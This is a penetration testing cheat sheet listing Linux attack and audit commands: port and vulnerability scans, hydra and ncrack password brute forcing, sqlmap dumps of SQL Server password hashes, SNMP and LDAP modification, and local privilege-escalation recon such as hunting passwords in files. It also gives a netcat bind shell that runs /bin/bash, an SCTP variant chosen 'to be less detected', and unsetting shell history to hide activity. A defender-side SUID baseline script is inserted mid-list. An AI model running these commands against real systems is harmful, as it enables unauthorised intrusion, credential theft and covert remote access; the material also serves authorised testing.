Penetration Testing Cheat Sheet

Terms of use

Regular penetration testing can significantly improve a company's security. The auditor shall obtain all necessary rights and permissions to conduct penetration tests from the owner of the target network or the owner of the target system before conducting any audit.

All the content and resources are provided in the hope that they will be useful. The author does not take responsibility for any misapplication of them. The document is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY.

Linux Security Audit Commands

------------------------------------------------------------
Useful commands to be used over the network for a Linux system
# traceroute
traceroute
# traceroute using ICMP
traceroute -I
# nmap TCP syn scan, all TCP ports with scripts, output to all nmap output formats
nmap -sS -sV -sC -v -p- -oA all-tcp-
nmap -sS -sV -A -v -p- -oA all-tcp-
# nmap reverse DNS resolution
nmap -Pn -sn -R -oA dns-
# update the nmap scripts
nmap --script-updatedb
# list nmap scripts
ls -la /usr/share/nmap/scripts/
# nmap brute force scripts
nmap -vvv --script http-brute --script-args userdb=users.txt,passdb=pass.txt -p <port> <host>
nmap --script vmauthd-brute -p <port> <host>
nmap --script ftp-brute -p <port> <host>
# help for script
nmap --script-help=ssl-heartbleed
# scan using script
nmap -sV --script=ssl-heartbleed.nse -p <port> <host>
# scan using a set of scripts (quoted so the shell does not expand the glob)
nmap -sV --script="smb*" -p <port> <host>
# nmap used as vulnerability scanner
mkdir /usr/share/nmap/scripts/vulscan
cd /usr/share/nmap/scripts/vulscan
git clone
nmap -sV --script=vulscan/vulscan.nse
# ncrack
ncrack -vv --user root <host>:<port>
# ncrack RDP
ncrack -vv -U username.txt -P password.txt <host>:3389
# ncrack SSH
ncrack -vv --user root <host>:22
# hydra
# Bruteforce SSH
hydra -L <user-list.txt> -P <password-list.txt> ssh://<host>
# Bruteforce IP router over HTTP
hydra -V -l admin -P passwords.txt -t 36 -f -s 80 http-get /
hydra -V -l admin -P passwords.txt -t 36 -f -s 80 http-get://
# Bruteforce FTP
hydra -V -l admin -P passwords.txt -e ns -f -s 21 ftp
# Bruteforce RDP
hydra -t 1 -V -f -l username -P password.lst rdp://
# skipfish
# basic scan
skipfish -o out_dir
# using cookies to access authenticated pages
skipfish -o out_dir -I urls_to_scan -X urls_not_to_scan -C cookie1=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX -C cookie2=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
# wfuzz
# URL brute forcing
wfuzz -c -z file,Directories_Common.wordlist --hc 404 http://<host>/FUZZ.php
# GET params brute forcing (FUZZ takes the first payload, FUZ2Z the second)
wfuzz -c -z file,users.txt -z file,pass.txt --hc 404 "http://<host>/index.php?user=FUZZ&pass=FUZ2Z"
# sqlmap
sqlmap -u ""
sqlmap -u "" --dbms "Microsoft SQL Server" --sql-query="select name,master.sys.fn_sqlvarbasetostr(password_hash) from master.sys.sql_logins"
sqlmap -u "" --dbms "Microsoft SQL Server" --dbs
sqlmap -u "" --dbms "Microsoft SQL Server" --dump -D database -T table
sqlmap -u "" --cookie "cookie1=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
# request read from a saved HTTP request file, testing only the given parameter
sqlmap -r POST.txt -p field
# MySQL
mysql -u <username> -p --port <port> -h <host>
# dump all databases including events, routines and triggers
mysqldump -h <host> -u <username> -p -f --port <port> --events --routines --triggers --all-databases > MySQLData.sql
# Oracle
sqlplus "username/password@(DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=hostname)(PORT=port))(CONNECT_DATA=(SERVER=dedicated)(SERVICE_NAME=servicename)))"
# Postgres
psql -h db_name username
# SNMP
# SNMPv1
snmpwalk -mALL -v1 -cpublic <host>
snmpwalk -mALL -v1 -cprivate <host>
snmpget -mALL -v1 -cpublic <host> sysName.0
# SNMPv2
snmpwalk -v2c -cprivate <host>:<port>
snmpget -v2c -cprivate -mALL <host> sysName.0 sysObjectID.0 ilomCtrlDateAndTime.0
snmpset -mALL -v2c -cprivate <host> ilomCtrlHttpEnabled.0 i 1
SUN-ILOM-CONTROL-MIB::ilomCtrlHttpEnabled.0 = INTEGER: true(1)
# SNMPv3
snmpwalk -v3 -l authPriv -u snmpadmin -a MD5 -A PaSSword -x DES -X PRIvPassWord <host>:<port> system
# LDAP
ldapsearch -x -b "dc=company,dc=com" -s base -h <host>
LDAPTLS_REQCERT=never ldapsearch -x -D "uid=Name.Surname,OU=People,DC=Company,DC=com" -W -H ldaps://<host> -b "uid=Name.Surname,OU=People,DC=Company,DC=com" -s sub
ldapsearch -x -p 389 -h "" -b "ou=people,dc=company,dc=com" -s sub "objectClass=*"
ldapsearch -x -p 1389 -h "" -b "dc=company,dc=com" -s one "objectClass=*"
ldapmodify -a -h "" -p 389 -D "cn=Directory Manager" -w 'password' -f modify.ldif
# contents of modify.ldif
dn: ou=people,dc=company,dc=com
objectClass: top
objectClass: organizationalunit
ou: people
...
ldapdelete -x -D "cn=Directory Manager" -w 'password' -p 1389 -h "" "uid=identifier,ou=people,dc=company,dc=com"
# NFS
showmount -e
mount -o ro /mnt/nfs
# SSHFS
# mount
sshfs user@<host>:/remote/path /mnt/tmp -C -p 22
# unmount
fusermount -u /mnt/tmp
# redir (TCP port redirector)
redir --laddr=<listen_address> --lport=<listen_port> --caddr=<connect_address> --cport=<connect_port>
# sending HTTP POST request
curl --data "param1=value1&param2=value2"
# sending SOAP request
#!/bin/sh
nc $HOST $PORT << __EOF__
POST /services/ HTTP/1.1
Host:
Content-Type: text/xml;charset=UTF-8
SOAPAction: ""

<soapenv:Envelope xmlns:soapenv="" xmlns:web="">
 <soapenv:Header/>
 <soapenv:Body>
  <web:soapRequest>
  </web:soapRequest>
 </soapenv:Body>
</soapenv:Envelope>
__EOF__
# Bash equivalent of SQL GROUP BY with counts
cat test.txt | sort | uniq -c | sort -n
# Wireshark over SSH
ssh root@ "sudo tcpdump -U -s0 -i lo -w - 'not port 22'" | wireshark -k -i -
wireshark -k -i <(ssh root@ tcpdump -U -s0 -i any -w - not port 22)
# HEX to PCAP
xxd -r -p test.hex | od -Ax -tx1 | text2pcap - test.pcap
# Parse JSON
grep -Po '"field" : .*?[^\\]",' test.json
# tshark to Elasticsearch output
./tshark -i any -f tcp -T ek -e "ip.addr" -e "tcp.port"
# tshark display filter to file
tshark -r input.pcap -Y "ip.src ==" -w output.pcap -F pcap
# john the ripper over GPU, OpenCL formats, start session
john --session=session_name --format=opencl ~/hash.txt
# john list the GPU OpenCL formats
john --list=formats --format=opencl
# john the ripper, continue session
john --restore=session_name
# john the ripper, show the cracked passwords
john ~/hash.txt --show
# dynamic formats
# edit john/JohnTheRipper/run/dynamic.conf
john --fork=16 --session=session_dynamic --format=dynamic_xxxx hash.txt
------------------------------------------------------------
Useful commands running locally on the Linux system, to quickly analyze the system and possibly help to escalate privileges.
# Before connecting to the remote system, start recording the interactive session with script; only then perform e.g. the ssh connection.
script <filename>
# login
ssh username@hostname
# check current shell
echo $0
# unset history file
unset HISTFILE
# check current user
whoami
# current folder
pwd
# list history of the user
history
# check system
uname -a
# check uptime
uptime
# check system variables
export
# processes
ps -ef
ps -auxf
ps -auxfwww
# partitions
df
# find in files
find . -name "*.java" -type f -exec fgrep -iHn "textToFind" {} \;
find . -regex ".*\.\(c\|java\)" -type f -exec fgrep -iHn "textToFind" {} \;
find / -maxdepth 4 -name "*.conf" -type f -exec grep -Hn "textToFind" {} \; 2>/dev/null
# SUID files owned by root
find / -uid 0 -perm -4000 -type f 2>/dev/null
# SUID files owned by root and world readable
find / -uid 0 -perm -u=s,o=r -type f -exec ls -la {} \; 2> /dev/null
# SUID files
find / -perm -4000 -type f 2>/dev/null
# world writable directories
find / -perm -2 -type d 2>/dev/null
# find passwords in files, ignore errors and filter out the proc and other folders
find . ! -path "*/proc/*" -type f -name "*" -exec fgrep -iHn password {} \;
find . -type f \( -iname \*.conf -o -iname \*.cfg -o -iname \*.xml -o -iname \*.ini -o -iname \*.json -o -iname \*.sh -o -iname \*.pl -o -iname \*.py \) -exec fgrep -iHn password {} \; 2> /dev/null
# find using several patterns read from file (patterns are delimited by new line)
find . -type f -exec grep -iHFf patterns.txt {} \;
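As an added defender-side variant of the SUID and world-writable searches above (this is not part of the original cheat sheet), the following POSIX shell functions record the SUID set as a baseline and report only binaries that appeared since, and they flag world-writable directories that lack the sticky bit, which is the condition that actually lets one user remove another user's files. The audit root and baseline file path are caller-supplied assumptions.

```shell
#!/bin/sh
# Added example: baseline-aware variants of the cheat sheet's SUID and
# world-writable checks. ROOT and BASELINE arguments are assumptions.

# find_suid ROOT: sorted list of regular files with the SUID bit under ROOT,
# staying on one filesystem (-xdev) so /proc and network mounts are skipped.
find_suid() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null | sort
}

# find_ww_dirs ROOT: world-writable directories without the sticky bit.
# /tmp-style directories (mode 1777) are expected and therefore not reported.
find_ww_dirs() {
    find "$1" -xdev -type d -perm -002 ! -perm -1000 2>/dev/null | sort
}

# save_suid_baseline ROOT BASELINE: record the current SUID set (sorted, as
# comm requires) for later comparison, ideally on a freshly installed system.
save_suid_baseline() {
    find_suid "$1" > "$2"
}

# suid_new BASELINE ROOT: SUID files present now but absent from BASELINE.
# Empty output is the expected state; any line deserves a closer look.
suid_new() {
    find_suid "$2" | comm -13 "$1" -
}

# Usage (hypothetical paths):
#   save_suid_baseline / /var/lib/audit/suid.baseline   # once, on a trusted system
#   suid_new /var/lib/audit/suid.baseline /              # later, during an audit
#   find_ww_dirs /
```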

# decompile java jar files and find passwords there
find . -name "*.jar" -type f -exec ~/jd-cli/jd-cli -oc -l -n -st {} \; | egrep -i -e "Location:" -e "password" | uniq
# check open ports and listening services
netstat -anp
# check defined hosts
cat /etc/hosts
# check local IP addresses and interfaces
ifconfig -a
# check sudo privileges
sudo -l
# check crontab
crontab -l
# check inittab
cat /etc/inittab
# try to sniff traffic
tcpdump
tcpdump not port 22 -w trace.pcap
# check known hosts
cat ~/.ssh/known_hosts
# try to access mails
head /var/mail/root
# list groups, users
cat /etc/group
cat /etc/passwd
# open netcat listener
# open tcp listener and execute bash after connect
nc -l -p <port> -e /bin/bash
# connect to nc
nc <host> <port>
# use sctp instead of tcp to be less detected
withsctp nc -l -p <port> -e /bin/bash
withsctp nc <host> <port>
# logout
logout
# close script session
Ctrl + D